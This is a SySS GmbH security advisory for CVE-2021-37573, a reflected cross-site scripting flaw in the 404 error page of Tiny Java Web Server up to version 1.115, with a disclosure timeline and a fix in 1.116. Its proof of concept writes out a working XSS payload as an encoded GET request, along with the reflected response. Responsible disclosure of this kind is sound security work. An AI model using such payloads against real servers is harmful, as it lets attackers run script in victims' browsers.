Tiny Java Web Server 1.115 Cross Site Scripting

`Advisory ID: SYSS-2021-042  
Product: Tiny Java Web Server and Servlet Container   
(TJWS)  
Manufacturer: D. Rogatkin  
Affected Versions: <= 1.115  
Tested Versions: 1.107, 1.114  
Vulnerability Type: Cross-Site Scripting (CWE-79)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2021-07-21  
Solution Date: 2021-07-23  
Public Disclosure: 2021-08-03  
CVE Reference: CVE-2021-37573  
Author of Advisory: Maurizio Ruchay, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Tiny Java Web Server and Servlet Container (TJWS) is a lightweight web  
server written in Java.  
  
The manufacturer describes the product as follows (see [1]):  
"The Miniature Java Web Server is built as a servlet container with HTTPD  
servlet providing standard Web server functionality."  
  
Due to improper input validation, the application is vulnerable to a  
reflected cross-site scripting attack.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
It is possible to inject malicious JavaScript code into the server's error  
page "404 Page Not Found".  
  
The given input is not properly validated and therefore reflected back  
and executed in a victim's browser.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
The following GET request shows how JavaScript code can be placed on  
the page:  
  
===  
HTTP request:  
GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1  
[...]  
Connection: close  
  
  
HTTP response:  
HTTP/1.1 404 te<img src=x onerror=alert(42)>st not found  
server: D. Rogatkin's TJWS (+Android, JSR340, JSR356)   
https://github.com/drogatkin/TJWS2.git/Version 1.114  
[...]  
content-length: 338  
connection: close  
  
<HTML><HEAD><TITLE>404 te<img src=x onerror=alert(42)>st not   
found</TITLE></HEAD><BODY BGCOLOR="#D1E9FE">  
[...]  
<H2>404 te<img src=x onerror=alert(42)>st not found</H2>  
[...]  
===  
  
If a browser renders the response, the JavaScript code is executed  
showing the message "42".  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The issue has been addressed in the release version 1.116.[2]  
Therefore, all instances of TJWS should be updated to this version.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2021-07-02: Vulnerability discovered  
2021-07-21: Vulnerability reported to manufacturer  
2021-07-23: Patch released by manufacturer  
2021-08-03: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for Tiny Java Web Server and Servlet Container (TJWS):  
http://tjws.sourceforge.net/  
[2] Patch release on Github:  
https://github.com/drogatkin/TJWS2/releases/tag/v1.116  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Maurizio Ruchay of SySS GmbH.  
  
E-Mail: [email protected]  
Public Key:   
https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc  
Key ID: 0xC7D20E267F0FA978  
Key Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: https://creativecommons.org/licenses/by/3.0/deed.en  
  
`